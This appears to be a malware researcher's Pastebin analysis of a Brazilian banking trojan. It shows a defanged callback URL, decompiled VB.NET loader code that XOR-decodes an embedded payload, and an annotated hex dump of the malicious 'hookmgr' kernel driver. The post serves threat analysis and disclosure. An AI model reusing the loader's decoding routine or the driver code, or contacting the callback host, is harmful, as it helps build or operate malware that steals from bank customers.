SHARE
TWEET

BraziL BankTrojan VB.NET w/Embed bins 37MB

MalwareMustDie Jan 30th, 2016 (edited) 630 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie - Case: Brazil Bank Trojan w/size 37MB
  2. // IS a VB.NET with Embedded binary.
  3. // callback to:
  4. // GET HTTP/1.1
  5. // h00p://contador.blackmagictwo.com/visualizar/fix.php
  6.    {
  7.      "ip": "200.98.201.148",
  8.      "ptr": "200-98-201-148.clouduol.com.br",
  9.      "country": "BR",
  10.      "loc": "-23.5477,-46.6358",
  11.      "org": "AS7162 Universo Online S.A."
  12.      "prf": "200.98.192.0/18 uol.com.br"
  13.    }
  14. // picref: https://twitter.com/MalwareMustDie/status/693641189648572416 (read full thread)
  15. // Sample (2)
  16.    https://www.virustotal.com/en/file/57a2dd99dd0c153a45b52f065645a8953b8a8fcef97a6c3538a4de166f845474/analysis/1454211673/
  17.    https://www.virustotal.com/en/file/887b3c737be52c594c12b564269bad659d9f8a37624bf6a624857d0735fc973c/analysis/1454219912/
  18.  
  19. // JINXED MALCODE BIN LOADER
  20.  
  21. // Toiusx.saojoao.Program
  22. public static void Main()
  23.  {  MyProject.Forms.Form2.BackgroundWorker1.RunWorkerAsync();}
  24.  
  25. private void Form1_Load(object sender, EventArgs e)
  26.   {Program.Main();}
  27.  
  28. private void BackgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
  29.   {this.WHATEVER();}
  30.  
  31. public void MMD-NAil3dYourC0de()
  32.  {  string[] array = Strings.Split(File.ReadAllText(Application.ExecutablePath),\\
  33.                      MySettingsProperty.Settings.tamp, -1, CompareMethod.Binary);
  34.     byte[] fosga = (byte[])typeof(Convert).GetMethod(this.var1.Text + this.var2.Text).\\
  35.                     Invoke(null, new object[]{array[1]});
  36.     Form1.Bolhax(Form1.READ_BYTES(fosga, this.var13.Text + this.var14.Text));  }
  37.  
  38. public static byte[] READ_BYTES(byte[] fosga, string ximu)
  39.  {  Array.Reverse(fosga);
  40.     checked
  41.      {
  42.       byte b = fosga[fosga.Length - 1];
  43.       byte[] bytes = Encoding.Default.GetBytes(ximu);
  44.       byte[] array = new byte[fosga.Length + 1];
  45.       int num = 0;
  46.       int arg_30_0 = 0;
  47.       int num2 = fosga.Length - 1;
  48.       for (int i = arg_30_0; i <= num2; i++)
  49.         {  array[i] = (fosga[i] ^ b ^ bytes[num]);
  50.        Array.Reverse(bytes);
  51.        if ((double)num == unchecked((double)bytes.Length - Conversions.ToDouble(MySettingsProperty.Settings.rip)))
  52.         {num = 0;}
  53.        else
  54.         {num = (int)Math.Round(unchecked((double)num + Conversions.ToDouble(MySettingsProperty.Settings.rip)));}
  55.         } return array;}}
  56.  
  57. // The data is actually a PE (no file) and is a malicious driver:
  58.    https://www.virustotal.com/en/file/e547aeb12345c226d24406ba751e9cb0f95a98b167b8eee5bacc370fc09d56e3/analysis/1454217852/
  59.  
  60. 00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
  61. 00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
  62. 00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  63. 00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
  64. 00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
  65. 00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
  66. 00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
  67. 00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
  68. 00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
  69. 00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
  70. 000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
  71. 000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
  72. 000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
  73. 000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
  74. 000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
  75. 000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
  76. 00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
  77. 00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
  78. 00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
  79. 00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
  80. 00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
  81. 00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  82. 00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
  83. 00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
  84. 00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  85. 00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
  86. 000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
  87. 000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  88. 000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
  89. 000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
  90. 000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
  91. 000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
  92. 00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
  93. 00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
  94. 00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
  95. 00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
  96. 00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
  97. 00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
  98. 00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
  99. 00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
  100. 00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
  101. 00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  102. 00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
  103. 00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  104. 00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  105. 00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
  106. 00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  107. 00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  108. 00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
  109. 00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
  110. 00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
  111. 000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
  112. 000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
  113. 000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
  114. 000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
  115. 000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
  116. 000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
  117. 00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
  118. 00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
  119. 00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
  120. 00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
  121. 00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
  122. 00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
  123. 00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
  124. 00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
  125. 00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
  126. 00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
  127. 000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
  128. 000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
  129. 000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
  130. 000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
  131. 000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
  132. 000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
  133. 00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
  134. 00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
  135. 00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
  136. 00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
  137. 00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
  138. 00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
  139. 00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
  140. 00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
  141. 00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
  142. 00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
  143. 000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  144. 000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
  145. 000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
  146. 000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
  147. 000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
  148. 000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
  149. 00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  150. 00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
  151. 00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
  152. 00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
  153. 00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
  154. 00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
  155. 00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
  156. 00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
  157. 00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
  158. 00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
  159. 000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
  160. 000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
  161. 000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  162. 000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
  163. 000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
  164. 000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
  165. 00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
  166. 00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
  167. 00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
  168. 00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
  169. 00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
  170. 00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
  171. 00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
  172. 00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
  173. 00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
  174. 00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
  175. 000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
  176. 000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
  177. 000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
  178. 000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
  179. 000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
  180. 000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
  181. 00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
  182. 00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
  183. 00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
  184. 00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
  185. 00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
  186. 00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
  187. 00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
  188. 00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
  189. 00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
  190. 00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
  191. 000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
  192. 000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
  193. 000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
  194. 000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
  195. 000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
  196. 000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
  197. 00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
  198. 00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
  199. 00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
  200. 00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
  201. 00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
  202. 00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
  203. 00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
  204. 00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
  205. 00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
  206. 00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
  207. 00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
  208. 00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
  209. 00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
  210. 00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
  211. 00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
  212. 00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
  213. 00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
  214. ---------------------------------------------------------------------------------------------
  215. 00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
  216. 00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
  217. 00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
  218. ---------------------------------------------------------------------------------------------
  219. 00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
  220. 00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
  221. 00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
  222. 00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
  223. ---------------------------------------------------------------------------------------------
  224. 00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.1385.1\inc\ddk\wdm.h
  225. 00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
  226. 00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
  227. 00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
  228. 00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
  229. 00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
  230. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  231. RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
  232. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  233. ---------------------------------------------------------------------------------------------
  234. 00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
  235. 00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
  236. 00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
  237. ---------------------------------------------------------------------------------------------
  238. 00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Devices\hookmgr
  239. 00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
  240. 00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  241. 00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
  242. 00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
  243. 00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
  244. 00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
  245. 00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
  246. 00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
  247. 00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
  248. 00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  249. 00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
  250. 00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
  251. 00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
  252. ---------------------------------------------------------------------------------------------
  253. 00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
  254. 00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
  255. 00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
  256. 00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
  257. 00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
  258. ---------------------------------------------------------------------------------------------
  259. 00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
  260. 00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
  261. 00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  262. 00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  263. 00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
  264. 00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  265. 00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
  266. 00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
  267. 00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
  268. 00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
  269. 00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
  270. 00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
  271. 00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
  272. 00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
  273. 00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
  274. 00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
  275. 000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
  276. 000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
  277. 000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
  278. 000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
  279. 000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
  280. 000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
  281. 00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
  282. 00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
  283. 00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
  284. 00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
  285. 00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
  286. 00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
  287. 00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
  288. 00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
  289. 00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
  290. 00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  291. 00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
  292. 00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
  293. 00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
  294. 00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
  295. 00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
  296. 00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
  297. 00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
  298. 00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
  299. 00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
  300. 00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
  301. 000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  302.  
  303. // The installation is reversed from entry point: 0x001403e -> 0x0011310
